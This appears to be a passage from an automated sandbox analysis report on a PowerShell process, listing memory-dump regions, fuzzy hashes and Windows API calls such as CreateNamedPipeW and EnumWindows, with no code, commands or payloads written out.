                                                • Instruction ID: dd04ce4856c7a47c7b9327da6bd6362af2016c3640a7602516c475ecf85b04eb
                                                • Opcode Fuzzy Hash: d96c30146de76b3a8988e114b12c972ceddd88ebc34bb5a94527bc30a547646e
                                                • Instruction Fuzzy Hash: 46024E34B002059FDB18DFB4C894AAEBBBABF88205F548469F902DB395DB75DC46CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984817224.0000000008670000.00000040.00000800.00020000.00000000.sdmp, Offset: 08670000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8670000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 675bdeaca9dbcbe50c10152f8c40a2dff91b8a75ea62c903b7171747d80e6f42
                                                • Instruction ID: 2482016f1c6ae002106529aa47f985466c8766232cf419880626d1db94ba9f0e
                                                • Opcode Fuzzy Hash: 675bdeaca9dbcbe50c10152f8c40a2dff91b8a75ea62c903b7171747d80e6f42
                                                • Instruction Fuzzy Hash: DAB1AD35B003009FDB259B79886866E7BA6EB89212B1584AED407CF795DF35DC02CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph: rendered graph omitted (function entry block at 8633950; executed / not-executed highlighting is not preserved in text)
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: SN$kH$kN$M
                                                • API String ID: 0-872941900
                                                • Opcode ID: ba9e588bedd0e277ba30ea5b8ed6e41b3b5db84f81343b017d0231b1ba752875
                                                • Instruction ID: 155d0cdcc584e5346737b5f61827b26764b88289646e6d805f7bb14b9175c3f2
                                                • Opcode Fuzzy Hash: ba9e588bedd0e277ba30ea5b8ed6e41b3b5db84f81343b017d0231b1ba752875
                                                • Instruction Fuzzy Hash: CE918C34A042059FC714DF68D590AAEB7F2EF88215F56C968E40AAF751CB39EC46CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph: rendered graph omitted (function entry block at 8633940; executed / not-executed highlighting is not preserved in text)
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: SN$kH$kN$M
                                                • API String ID: 0-872941900
                                                • Opcode ID: c663fcac74bad1b6ca8e084fb8909d2d446d584d61f0528340e3080ca2c515e9
                                                • Instruction ID: 8d8c213d7cf76a1afe1b4ca6a49196fca278a0577dc04f64b207dc1ce21c4268
                                                • Opcode Fuzzy Hash: c663fcac74bad1b6ca8e084fb8909d2d446d584d61f0528340e3080ca2c515e9
                                                • Instruction Fuzzy Hash: 71919D34A002459FC714DF68D580AAEBBF2EF88219F56C96CE406AF751CB35EC46CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph: rendered graph omitted (function entry block at 86361e8; executed / not-executed highlighting is not preserved in text)
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'}l$c}l
                                                • API String ID: 0-3983991366
                                                • Opcode ID: 1df06323503bd74f623b11aa9c934c308e0dc60d248f867683e6819530bb5dcd
                                                • Instruction ID: 5679151a2e73c00c6117556a0f06ca8849b3c663d8d4fe47ba2216e4ab7bbe79
                                                • Opcode Fuzzy Hash: 1df06323503bd74f623b11aa9c934c308e0dc60d248f867683e6819530bb5dcd
                                                • Instruction Fuzzy Hash: 9C41E4347042105FD708ABB8D894BBE37E69FCA615F1640B9D50ACF7A1DF25DC0687A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph: rendered graph omitted (function entry block at 8f653d0, with a call to SetThreadUILanguage; executed / not-executed highlighting is not preserved in text)
                                                APIs
                                                • SetThreadUILanguage.KERNELBASE ref: 08F65892
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4990038177.0000000008F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8f60000_powershell.jbxd
                                                Similarity
                                                • API ID: LanguageThread
                                                • String ID:
                                                • API String ID: 243849632-0
                                                • Opcode ID: 63958e25cf07394a691ef7375eb3f88955d55a97fc6ed9feb73b888ca360cc5f
                                                • Instruction ID: 84b4fe68146077bc3d82dfca0edc6c31051b3a640474824326133434dc70ddd3
                                                • Opcode Fuzzy Hash: 63958e25cf07394a691ef7375eb3f88955d55a97fc6ed9feb73b888ca360cc5f
                                                • Instruction Fuzzy Hash: C2C10774A00204CFCB14DF68D598AADBBF6BF88326F1585A9E406AB361DB35DD11CF60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                [Control-flow graph rendered as an image in the original report; only the node list survived extraction. Basic blocks span 8631760-8631dc0 in the 08630000 region, with internal calls to 863ba49 (from block 8631848-8631854) and to 8631ed0 / 8631ec8 (from block 8631801).]
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ;}l
                                                • API String ID: 0-3723764175
                                                • Opcode ID: 02e180d4b3dd25b0d80cb36f07b4fe178f5e8723ca40310c4e51f44d6a9fd708
                                                • Instruction ID: 715082fb8801a36de026d05613e39320ccb43fc2fd5545bd86c71b87f9a48de4
                                                • Opcode Fuzzy Hash: 02e180d4b3dd25b0d80cb36f07b4fe178f5e8723ca40310c4e51f44d6a9fd708
                                                • Instruction Fuzzy Hash: E8127D34B002249FCB14DF68D594AADB7F6EF89315F1640A9E502EB3A1DB75EC42CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateNamedPipeW.KERNELBASE(00000000,40080003,?,?,?,00000000,00000001,00000000), ref: 08746398
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4985397772.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8740000_powershell.jbxd
                                                Similarity
                                                • API ID: CreateNamedPipe
                                                • String ID:
                                                • API String ID: 2489174969-0
                                                • Opcode ID: f411c91ec2fb23592d51bd5fe9b16b838872878723f4c33c985046eea0868c77
                                                • Instruction ID: d547979fe92151b61043fb7aba901f93eb32a70e12dda19f106f611ac4baca16
                                                • Opcode Fuzzy Hash: f411c91ec2fb23592d51bd5fe9b16b838872878723f4c33c985046eea0868c77
                                                • Instruction Fuzzy Hash: 915116B0D00348EFDB14CFA9C884BDEBBF6AF59314F24852AE408AB251D7749981CF51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateNamedPipeW.KERNELBASE(00000000,40080003,?,?,?,00000000,00000001,00000000), ref: 08746398
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4985397772.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8740000_powershell.jbxd
                                                Similarity
                                                • API ID: CreateNamedPipe
                                                • String ID:
                                                • API String ID: 2489174969-0
                                                • Opcode ID: 1bc3e49b3de683ea03be2aacc6761d2da6000d85ee5ed5cbe609a8d2f8855a84
                                                • Instruction ID: 777542f9bd1d4c82f11e63a86960632689a8d699ebde2f66d259333672b94cc5
                                                • Opcode Fuzzy Hash: 1bc3e49b3de683ea03be2aacc6761d2da6000d85ee5ed5cbe609a8d2f8855a84
                                                • Instruction Fuzzy Hash: 5D51F4B1D00358EFDB14CFA9D884BCEBBF6AF49304F24852AE418AB261D7749985CF51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateFileA.KERNELBASE(?,?,?,?,?,?,?), ref: 085EF9A6
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4983617495.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_85e0000_powershell.jbxd
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                • Opcode ID: ca2b3279634c466cb6800e2d984eecd81b506374362e18bb7c0391c65fb7fd1c
                                                • Instruction ID: ee74cc10c4e5563cfd81c2a11bf7be080a8ad3aa588009b5b49f9f5a33d63852
                                                • Opcode Fuzzy Hash: ca2b3279634c466cb6800e2d984eecd81b506374362e18bb7c0391c65fb7fd1c
                                                • Instruction Fuzzy Hash: 75412471D00249AFDB14CFA9C885BDEBBF2BF48314F148169E859EB250CB749885CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetFileAttributesW.KERNELBASE(00000000), ref: 0505A650
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4962312820.0000000005050000.00000040.00000800.00020000.00000000.sdmp, Offset: 05050000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_5050000_powershell.jbxd
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                • API String ID: 3188754299-0
                                                • Opcode ID: 612d739c4c4d443ee1a4f387d3a45e4039c3b2bee0fcb819217e09be401c992b
                                                • Instruction ID: e3e37d3fc086426d339632fdc75f05930dfde205fdcc6b281f18fa99fabac164
                                                • Opcode Fuzzy Hash: 612d739c4c4d443ee1a4f387d3a45e4039c3b2bee0fcb819217e09be401c992b
                                                • Instruction Fuzzy Hash: C22106B1D006199BCB10CF9AD844BDEFBF8FB48620F04856AD819B7240D774AA44CFE5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetFileAttributesW.KERNELBASE(00000000), ref: 0505A650
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4962312820.0000000005050000.00000040.00000800.00020000.00000000.sdmp, Offset: 05050000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_5050000_powershell.jbxd
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                • API String ID: 3188754299-0
                                                • Opcode ID: 4f27125a8d6428bd3f9491142a61883128617324562ae89337346ce8e109a9a5
                                                • Instruction ID: 003e67232139e6b9074500274238f19e12c231e3575c46e06d5af6a345e34aff
                                                • Opcode Fuzzy Hash: 4f27125a8d6428bd3f9491142a61883128617324562ae89337346ce8e109a9a5
                                                • Instruction Fuzzy Hash: D02122B5D0061A9BCB10CFAAD444BDEFBF8FF48620F00852AD818A7240C778A945CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ReadFile.KERNELBASE(?,?,?,?,?), ref: 085EFAAE
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4983617495.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_85e0000_powershell.jbxd
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: bcebaf4de2ddf2e2a5dbaa09394abbb822dd7b7038701f2ad1ff2e2f594bc0cb
                                                • Instruction ID: 77ba994b8a3cc3f731fa4f542df6314b11f43152e2d74e88f1538e29f2accca0
                                                • Opcode Fuzzy Hash: bcebaf4de2ddf2e2a5dbaa09394abbb822dd7b7038701f2ad1ff2e2f594bc0cb
                                                • Instruction Fuzzy Hash: 4B11E4B59002499FCB20CF9AD884BDEFBF4FF48324F14842AE919A7250C774A954CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • SetThreadUILanguage.KERNELBASE ref: 08F65892
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4990038177.0000000008F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8f60000_powershell.jbxd
                                                Similarity
                                                • API ID: LanguageThread
                                                • String ID:
                                                • API String ID: 243849632-0
                                                • Opcode ID: 85d46c95a720950010cbda1482391b41931e26e0f6464abd2cc132467938fc26
                                                • Instruction ID: cdb3fa80235794f04f431e2897b2d66cfc4c08a062bad9f7e5324d2ac7d3e616
                                                • Opcode Fuzzy Hash: 85d46c95a720950010cbda1482391b41931e26e0f6464abd2cc132467938fc26
                                                • Instruction Fuzzy Hash: 381103B48006598FCB10CFA9D488BEEFBF8EF48725F10845AD568A7650C778A944CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4983617495.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_85e0000_powershell.jbxd
                                                Similarity
                                                • API ID: EnumWindows
                                                • String ID:
                                                • API String ID: 1129996299-0
                                                • Opcode ID: cc5c7427f173148334a9e1b0e0088db96ec975ba1f5d944e599b4ef375972500
                                                • Instruction ID: 7b029c1b346186bca5981364ea5aa75e0c1030f509e328c976de0cf5241762fd
                                                • Opcode Fuzzy Hash: cc5c7427f173148334a9e1b0e0088db96ec975ba1f5d944e599b4ef375972500
                                                • Instruction Fuzzy Hash: A61103B18003498FCB20CF9AD888BDEBBF8EF88324F108459D458A7250C774A944CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ;+
                                                • API String ID: 0-1950319332
                                                • Opcode ID: 07a1623843bc3fe8ed0d38fa397b98c7002b7bb8b15945cdbe31fef5c44b213d
                                                • Instruction ID: eafe696a6ba8a153bf98e7a36a6372780fb13d44f8a4f7dd12a21a0a8c85ccd5
                                                • Opcode Fuzzy Hash: 07a1623843bc3fe8ed0d38fa397b98c7002b7bb8b15945cdbe31fef5c44b213d
                                                • Instruction Fuzzy Hash: EAA12334A04204AFDB05DFA4D854BEE7BBAEFC4311F05846AE8069B791CF399D46CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LR}l
                                                • API String ID: 0-1093396623
                                                • Opcode ID: 518971b00d8eb7c56a361c037b5fad820446d94ddd516fd2cdab3280d533702e
                                                • Instruction ID: 0e834478ed41a18ffd9de03117fc7f39d9f4fa20522da646baf8b8a3b00767ae
                                                • Opcode Fuzzy Hash: 518971b00d8eb7c56a361c037b5fad820446d94ddd516fd2cdab3280d533702e
                                                • Instruction Fuzzy Hash: 51A14674A00214DFC718EF64D498AADBBB2FF89315F158469E9069B3A0DB75EC42CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LR}l
                                                • API String ID: 0-1093396623
                                                • Opcode ID: 6a0998f8faeeff7c3f4e92829381f8b107955f1ac6a7e68ed08923665e1aceda
                                                • Instruction ID: c9fb19300facbdc65ca77ab222753ccf29e6de64eb77cb0c2af45c147c86be1a
                                                • Opcode Fuzzy Hash: 6a0998f8faeeff7c3f4e92829381f8b107955f1ac6a7e68ed08923665e1aceda
                                                • Instruction Fuzzy Hash: 72513A70A00218CFDB18DFA4D499BAEBBB6FF48706F154179E406AB390DB359D46CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ;+
                                                • API String ID: 0-1950319332
                                                • Opcode ID: 7205ce0f6dc649017ea1c4a47267dbb1a9cbda2d7f6e4331776d30e23f436331
                                                • Instruction ID: 2dcc1d167880f876316524fe21b54ae360073d186157aaec661f886f9de3fb09
                                                • Opcode Fuzzy Hash: 7205ce0f6dc649017ea1c4a47267dbb1a9cbda2d7f6e4331776d30e23f436331
                                                • Instruction Fuzzy Hash: ED212372600225AFDB118F48D840AFE7BE6FF84325F06852EF8049B251C779CC12CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984817224.0000000008670000.00000040.00000800.00020000.00000000.sdmp, Offset: 08670000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8670000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8fe96ee0e6fbde6fd146e32aa4a68086da38dc0954bcf964290e5cbcb0692cf2
                                                • Instruction ID: 849928e13a3cbc5c3653a8e798ec0f0446e81a284dc72fea853c0bf7f94f894e
                                                • Opcode Fuzzy Hash: 8fe96ee0e6fbde6fd146e32aa4a68086da38dc0954bcf964290e5cbcb0692cf2
                                                • Instruction Fuzzy Hash: BBF1153060E7C49BD376DB78C48C55ABFE2EF82224B49899DC1C99F643CE265815DB82
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4985908941.00000000087F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_87f0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: aebf356af025a4f95d7011e5880a6a5198b7ba8210f990ba5a6d5fb320ba74a8
                                                • Instruction ID: 1644d9d674fc9d5ed99d354a5cd6ee1e5841aa41b7322baaf607bfc01c914ec8
                                                • Opcode Fuzzy Hash: aebf356af025a4f95d7011e5880a6a5198b7ba8210f990ba5a6d5fb320ba74a8
                                                • Instruction Fuzzy Hash: 9D020C34A00218CFCB14DFA5D494A9DBBB6FF89305F258469D50AAB365DB35EC41CF50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 007a072ebc1bbae59494e7263472896b30310b25d2bea59e558a4b3e61e4bedf
                                                • Instruction ID: 9f6f474ef31097b6cfa70fe97ccfb62c66731d9a359f23563598d7ab0744603c
                                                • Opcode Fuzzy Hash: 007a072ebc1bbae59494e7263472896b30310b25d2bea59e558a4b3e61e4bedf
                                                • Instruction Fuzzy Hash: C5C1BF357006158FC714EB68C890AAE73A7EFC4218B468968E506DF365DF74ED0ACBE1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4985908941.00000000087F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_87f0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f95d331576a876ac737d921f0917f8aa79339f46c9f8063e17ceee7397f05157
                                                • Instruction ID: 31835f44681e05959b78918fc0ec44117e2714f6e3d59420a258d5154cd8ae70
                                                • Opcode Fuzzy Hash: f95d331576a876ac737d921f0917f8aa79339f46c9f8063e17ceee7397f05157
                                                • Instruction Fuzzy Hash: 79C16C34B00204CFDB14DB65D484BAEB7E6AF88316F198079EA06DB3A6DB74DC45CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f02134814c7f3f18c10dbfc675220637267533eda5399f9e8f0568363cf77054
                                                • Instruction ID: 2c6bc8bf61bcd4a9a16626ae347ed1eb84a7a7bedecfac9f2b311894a8a09a6e
                                                • Opcode Fuzzy Hash: f02134814c7f3f18c10dbfc675220637267533eda5399f9e8f0568363cf77054
                                                • Opcode Fuzzy Hash: d74e64c19643488db5697fb95471319346523015f00d95bc8f4a3b7a78584fe8
                                                • Instruction Fuzzy Hash: EB512834A00204CFCB58DB7AD444AAEBBF2EF88356B15806DE906E7355DB35D841CFA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b466fb1a723665510336f77bfc771e74c40f06fe7d4415aa04d23d1b4e1a96cb
                                                • Instruction ID: af734ddbf524ffc8f7ca1ff7a16da1d4477e37addeda34e6661edf80ccb3c9e6
                                                • Opcode Fuzzy Hash: b466fb1a723665510336f77bfc771e74c40f06fe7d4415aa04d23d1b4e1a96cb
                                                • Instruction Fuzzy Hash: B7412734A082955FCF15DF789464AAE7FF6AF89200F05406DE845D7352CF388D06D7A2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984817224.0000000008670000.00000040.00000800.00020000.00000000.sdmp, Offset: 08670000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8670000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 69ad617d5a902358b15b1a7b2a8c7328603070b5491865da0e1e213aca91be34
                                                • Instruction ID: 4852fa1f4194a056f23e731d2b30d2bab26f0adeae039b1e9ffc93892219bf5b
                                                • Opcode Fuzzy Hash: 69ad617d5a902358b15b1a7b2a8c7328603070b5491865da0e1e213aca91be34
                                                • Instruction Fuzzy Hash: A3514C34A00719CFCB14DF68D444AEDB7F2EF88315F15892DD815AB350DB74A846CBA6
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c1244d9d3954722400eafe591e4b450b1b9b88fd2d538cacd84895693352c010
                                                • Instruction ID: 82b16262863ee495b5d6f2c0536be405d927a1430f07b120e3bae3f7dd904c79
                                                • Opcode Fuzzy Hash: c1244d9d3954722400eafe591e4b450b1b9b88fd2d538cacd84895693352c010
                                                • Instruction Fuzzy Hash: 8C41CFB8700760ABDB249F6CD8446AE7AE6FFC9212B15442CE947D7341DF78EC158B90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8f61996906b70e7485fbe94ea795cefea232181c312f0a1db07c1e9d0f1cd9f5
                                                • Instruction ID: 8a12b57ae01150417da12d9fb27b9dd20de5ba81bbc759e4bcb856ce339a0b2c
                                                • Opcode Fuzzy Hash: 8f61996906b70e7485fbe94ea795cefea232181c312f0a1db07c1e9d0f1cd9f5
                                                • Instruction Fuzzy Hash: 6E41B5346002016FDB24EB74C885BAE37A3EF85314F054978E502AF795DB79AC06CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4985908941.00000000087F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_87f0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a97e0567e46733534bd0980782caee8133bc116da199e80a73098e37d2dec395
                                                • Instruction ID: 77e0bbd0a213f51cc3b35ae88ebc68ac52f310accb382c3817e8a0d23b048b74
                                                • Opcode Fuzzy Hash: a97e0567e46733534bd0980782caee8133bc116da199e80a73098e37d2dec395
                                                • Instruction Fuzzy Hash: 1A516A74A00209DFDB14DFA5D8947AEBBB6FB88310F108428E50AAB395CF349D85DF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e73076d157b4c534d87894f7aae263200f30cdff664776968bdd04425f3d91a9
                                                • Instruction ID: 98a7776e978fe1e424e32a143697fd78e88f3d19254c9284fd3fc29218395a09
                                                • Opcode Fuzzy Hash: e73076d157b4c534d87894f7aae263200f30cdff664776968bdd04425f3d91a9
                                                • Instruction Fuzzy Hash: 9E416E71A00224CBDB15CF69D5607EDB7F1EF88267F068069D505E7350EB359E46CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4985908941.00000000087F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_87f0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bbf9b4f42bda82b51be266b5faf8919fff4b341363a1a205ccf5a95175d9e890
                                                • Instruction ID: 3aaf9aa5d7b8a2bff368744609fd34fe563687f44608ee1503e438456a0a164e
                                                • Opcode Fuzzy Hash: bbf9b4f42bda82b51be266b5faf8919fff4b341363a1a205ccf5a95175d9e890
                                                • Instruction Fuzzy Hash: 40413534A00254CFCB58DF7AC444AAABBF2EF89356B1580BDD906AB355DB35D841CFA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8ef8eca9e09c19943571a366c7050dec52f89e3a90f656327472c5400a79d071
                                                • Instruction ID: dabf9d17fdcb492e2a3adadd2c0967d0ccdcf93efc27200ba7defc2eb174a12d
                                                • Opcode Fuzzy Hash: 8ef8eca9e09c19943571a366c7050dec52f89e3a90f656327472c5400a79d071
                                                • Instruction Fuzzy Hash: 3341D270B053949FCB02DB68E45499DBFF2EF8A210B0A419AF545DB362CA349C0ACB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984817224.0000000008670000.00000040.00000800.00020000.00000000.sdmp, Offset: 08670000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8670000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6fa90397692bd76d4eb5033292e0f489a79e237960efc29685fdc4c2c7d2e2f3
                                                • Instruction ID: c74596b57501aa823bd947f4cdfb2bee7557b9578741e23371b56974ccb30000
                                                • Opcode Fuzzy Hash: 6fa90397692bd76d4eb5033292e0f489a79e237960efc29685fdc4c2c7d2e2f3
